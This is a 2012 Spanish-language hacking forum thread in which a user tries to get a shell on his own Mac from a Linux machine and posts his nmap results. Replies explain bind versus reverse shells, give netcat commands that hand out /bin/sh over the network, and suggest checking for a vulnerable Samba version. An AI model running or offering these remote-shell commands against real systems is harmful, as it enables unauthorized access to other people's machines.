|
Título: Conseguir Shell Publicado por: frantheviking en 6 Diciembre 2012, 23:13 pm Hola, tengo dos ordenadores conectados en mi red, uno con linunx, y otro con MAC OSX. He buscado con nmap los puertos abiertos del MAC desde mi linux, he probado a conseguir shell con mi linux en el MAC, pero sin resultados positivos. Este es el resultado de mi nmap sobre la victima: Nmap scan report for 192.168.1.8 Host is up (0.0050s latency). Not shown: 994 closed ports PORT STATE SERVICE 88/tcp open kerberos-sec 139/tcp open netbios-ssn 445/tcp open microsoft-ds 515/tcp open printer 548/tcp open afp 631/tcp open ipp Que posibilidades tengo? He hecho nc -l -p 139 y en la victima nc -e /bin/sh 192.168.1.8 139, pero de nuevo nada de nada Gracias Título: Re: Conseguir Shell Publicado por: RevangelyonX en 7 Diciembre 2012, 14:52 pm Hola
Posibilidades ninguna. Estas confundiendo terminos básicos de bind shell reverse shell etc. Lo que quieres es obtener una shell de pruebas sin explotar ningun servicio. Por lo tanto el escenario puede ser el siguiente: Vic1 escuchando un puerto y -e /bin/sh (esto es bind) o Vic1 conectandose a un puerto y maquina remota y -e /bin/sh (esto es reverse shell) El problema de tu caso es que primero confundes victima con atacante. Segundo que no puedes hacer un listen en un puerto que ya esta open. Te sugiero lo siguiente: victima nc -nlp 4444 -e /bin/sh atacante nc ip.dd.victima 4444 esto Es una bind shell. Le información sobre el uso de Netcat y sus posibiliades. Salu2 Título: Re: Conseguir Shell Publicado por: adastra en 20 Diciembre 2012, 13:25 pm que version de samba esta corriendo en tu Mac?
ejecuta: nmap -sSV -T5 -A ip Algunas versiones de samba que corren sobre Mac son vulnerables, esa seria tu única alternativa de entrar en aquella máquina. |